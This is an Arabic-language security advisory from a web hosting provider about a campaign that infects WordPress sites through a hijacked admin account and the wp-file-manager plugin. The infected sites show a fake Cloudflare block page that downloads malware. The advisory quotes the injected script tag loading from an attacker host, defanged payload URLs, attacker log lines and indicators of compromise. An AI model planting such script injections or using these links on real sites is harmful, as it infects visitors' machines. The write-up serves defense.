صفحة حظر Cloudflare المخادعة قد تشير إلى اختراق موقعك WordPress
محتويات
وصف العدوى
في 15 سبتمبر، تم إكتشاف حملة خبيثة. كان من الواضح أن المهاجمين الذين تم إكتشافهم كانوا يستخدمون تقنيات التصيد الاحتيالي لخداع المستخدمين لتنزيل ملف ثنائي ضار. استخدموا رسالة مزيفة على مواقع الويب تفيد بأنه تم حظر المستخدم بواسطة Cloudflare. وفي الوقت نفسه، فإن المواقع المصابة التي تتلقى الرسالة لن تستخدم بالضرورة خدمات Cloudflare.
ومع ذلك، بمجرد نقر المستخدم على هذه النافذة المنبثقة الزائفة، يتم تنزيل البرنامج الضار الثنائي على أجهزة الكمبيوتر الخاصة به. يؤدي النقر فوق الزر “Check the system” إلى تنزيل ملف ثنائي ضار (sha256: fee5d6b401c6b0164da2bb7472bdd9b4914c4725d03b2029687756e21bb24dc9 ). هنا تم الكشف عن رابط التحميل:
# https://gitlab[.]com/devang-acespritech/openck/-/raw/main/CloudSt.zip
يبلغ حجم الأرشيف الذي يتم تنزيله 10 ميغابايت فقط، ولكن يتم تحميل ملف آخر غير المضغوط حوالي 700 ميغابايت. يبدو واضحًا أن المهاجمين تعمدوا توزيع أحجام الحزم بحيث يتم إخضاع هذه الملفات للرادار وألا تظهر على العديد من خدمات فحص الفيروسات عبر الإنترنت.
ناقلات الهجوم
في جميع حالات الإصابة وجدنا ملفات تم حقنها في الووردبريس بهذه الأسماء. تبدو هكذا:
./wp-includes/js/jquery/jquery.js ./wp-includes/js/jquery/jquery.min.js
الحقن معتم بشدة للأسف، لكن يمكن اكتشافه إذا بحث المرء عن النمط التالي:
تقوم هذه الشفرة ، بعد تنفيذها ، بإدخال نص برمجي ضار آخر في الكود المصدري للصفحة:
<script src="https://gloogletag[.]com/tagged/ajax.js">
يقوم الكود الموضح أعلاه بتحميل كود HTML الخاص بنموذج Cloudflare المزيف باستخدام عنوان url التالي:
https://gloogletag[.]com/code/cloudflare.txt
عند اكتشاف هذه العدوى، ذهبنا لإجراء تحقيق. بعد فحص سجلات خادم الويب، اكتشفنا أن المتسللين استخدموا نفس الطريقة في جميع الحالات المسجلة.
لكي يبدأ هذا الهجوم، يحتاج المتسلل إلى الوصول إلى حساب مسؤول WordPress المخترق. بعد الحصول على إذن ناجح، يحتاج المهاجم إلى تثبيت المكون الإضافي wp-file-manager.
35.184.195.84 - - [15/Sep/2022:08:55:44 -0400] "POST /wp-login.php HTTP/2.0" 302 - "https://victim/wp-login.php" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0" 35.184.195.84 - - [15/Sep/2022:08:55:54 -0400] "POST /wp-admin/admin-ajax.php HTTP/2.0" 200 193 "https://victim/wp-admin/plugin-install.php?s=file+manager&tab=search&type=term" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0" 35.184.195.84 - - [15/Sep/2022:08:56:42 -0400] "POST /wp-admin/admin-ajax.php HTTP/2.0" 200 279 "https://victim/wp-admin/admin.php?page=wp_file_manager" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0"
في جميع الحالات التي سجلناها، كان عنوان IP الخاص بالأجهزة التي نفذت هذا الهجوم هو نفسه: 35.184.195.84
مؤشرات تشير إلى الإختراق
gloogletag[.]com 35.184.195.84 fee5d6b401c6b0164da2bb7472bdd9b4914c4725d03b2029687756e21bb24dc9
كيفية حماية موقعك ووردبريس من العدوى
يرجى اتباع الخطوات التالية:
- قم بتحديث البرنامج بشكل منتظم.
- استخدم 2FA وكلمات مرور قوية
- استخدم جدار حماية (Firewall).
نهتم في استضافة الدعم العربي بأمن البنية التحتية لديك. لذلك نسعى دائمًا لإبقائك على اطلاع دائم بجميع المعلومات اللازمة لحماية موقع الويب الخاص بك والتأكد من أن عملك يعمل بسلاسة في جميع الأوقات. من فضلك لا تتردد في الرد على أي أسئلة لديك حول حماية موقع الويب الخاص بك من أي نشاط ضار إلى فريق الدعم الخاص بنا.
المصدر
The deceptive Cloudflare block page that signals WordPress infection
معلومات قيمة ومفيده شكرا كثرا